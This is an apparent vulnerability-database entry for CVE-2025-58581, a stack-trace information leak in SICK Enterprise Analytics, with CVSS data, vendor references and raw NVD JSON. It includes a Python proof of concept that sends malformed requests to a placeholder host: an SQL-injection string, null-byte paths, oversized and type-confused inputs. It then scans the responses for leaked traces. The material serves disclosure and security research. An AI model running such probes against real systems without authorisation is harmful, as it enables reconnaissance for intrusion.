Security Vulnerability Report
CVE-2025-58581 CVSS 4.3 MEDIUM

CVE-2025-58581

Published: 2025-10-06 07:15:35
Last Modified: 2026-01-27 16:44:32

Description

When an error occurs in the application a full stacktrace is provided to the user. The stacktrace lists class and method names as well as other internal information. An attacker can thus obtain information about the technology used and the structure of the application.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:sick:enterprise_analytics:*:*:*:*:*:*:*:* - VULNERABLE
SICK related products (for the specific affected versions, refer to CSAF security advisory sca-2025-0010)
The affected firmware version range is detailed at https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0010.json

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-58581 PoC - SICK Product Stack Trace Information Disclosure
# This PoC demonstrates how to trigger verbose error messages
# that leak internal application information via stack traces.
import re

import requests
from urllib.parse import urljoin

TARGET_URL = "https://target-sick-product.example.com"
AUTH_COOKIE = {"session": "authenticated_session_token"}  # Low-privilege auth required


def trigger_stacktrace(endpoint, method="GET", data=None, params=None, headers=None):
    """
    Send a malformed request to trigger an unhandled exception
    and capture the leaked stack trace.
    Returns the response body when a stack trace is detected, else None.
    """
    url = urljoin(TARGET_URL, endpoint)
    default_headers = {
        "User-Agent": "Mozilla/5.0 (compatible; SecurityResearcher/1.0)",
        "Accept": "application/json",
    }
    if headers:
        default_headers.update(headers)

    try:
        if method.upper() == "GET":
            resp = requests.get(url, params=params, cookies=AUTH_COOKIE,
                                headers=default_headers, timeout=10, verify=False)
        elif method.upper() == "POST":
            resp = requests.post(url, json=data, cookies=AUTH_COOKIE,
                                 headers=default_headers, timeout=10, verify=False)
        else:
            resp = requests.request(method, url, cookies=AUTH_COOKIE,
                                    headers=default_headers, timeout=10, verify=False)

        # Check if the response body contains a stack trace from a common runtime
        stacktrace_patterns = [
            r'at\s+[\w\.$<>]+\([\w\.]+:\d+\)',               # Java style
            r'at\s+[\w\.]+\s+in\s+[\w\\:\\]+\s+line\s+\d+',  # .NET style
            r'File "[^"]+", line \d+',                       # Python style
            r'Traceback \(most recent call last\)',          # Python traceback
            r'Exception in thread',                          # Java exception
            r'System\.[A-Za-z]+Exception',                   # .NET exception
        ]
        for pattern in stacktrace_patterns:
            if re.search(pattern, resp.text):
                print(f"[+] Stack trace detected at {endpoint}")
                print(f"[+] Status code: {resp.status_code}")
                print(f"[+] Leaked information:\n{resp.text[:2000]}")
                return resp.text
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
    return None


if __name__ == "__main__":
    # Test 1: Trigger error with malformed JSON payload
    print("[*] Test 1: Malformed JSON payload")
    trigger_stacktrace("/api/v1/config", method="POST",
                       data={"invalid": "\x00\xff\xfe malformed"})

    # Test 2: Trigger error with SQL-like input in parameter
    print("\n[*] Test 2: Special characters in parameter")
    trigger_stacktrace("/api/v1/device/status", params={"id": "' OR '1'='1"})

    # Test 3: Trigger error with very long input (buffer overflow attempt)
    print("\n[*] Test 3: Oversized input")
    trigger_stacktrace("/api/v1/user/profile", method="POST",
                       data={"name": "A" * 100000})

    # Test 4: Trigger error with null bytes
    print("\n[*] Test 4: Null byte injection")
    trigger_stacktrace("/api/v1/file/read", params={"path": "file.txt\x00.jpg"})

    # Test 5: Trigger error with type confusion
    print("\n[*] Test 5: Type confusion")
    trigger_stacktrace("/api/v1/settings", method="POST",
                       data={"timeout": {"nested": "object instead of integer"}})

    print("\n[*] PoC execution completed.")

References

https://sick.com/psirt (Vendor Advisory)
https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0010.json (Vendor Advisory)
https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0010.pdf (Vendor Advisory)
https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf (Product)
https://www.cisa.gov/resources-tools/resources/ics-recommended-practices (US Government Resource)
https://www.first.org/cvss/calculator/3.1 (Not Applicable)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-58581", "sourceIdentifier": "[email protected]", "published": "2025-10-06T07:15:34.567", "lastModified": "2026-01-27T16:44:31.787", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "When an error occurs in the application a full stacktrace is provided to the user. The stacktrace lists class and method names as well as other internal information. An attacker can thus obtain information about the technology used and the structure of the application."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sick:enterprise_analytics:*:*:*:*:*:*:*:*", "matchCriteriaId": "04E8EA78-2780-40C0-B5BA-6CF99DE6355B"}]}]}], "references": [{"url": "https://sick.com/psirt", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cisa.gov/resources-tools/resources/ics-recommended-practices", "source": "[email protected]", "tags": ["US Government Resource"]}, {"url": "https://www.first.org/cvss/calculator/3.1", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0010.json", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": 
"https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0010.pdf", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf", "source": "[email protected]", "tags": ["Product"]}]}}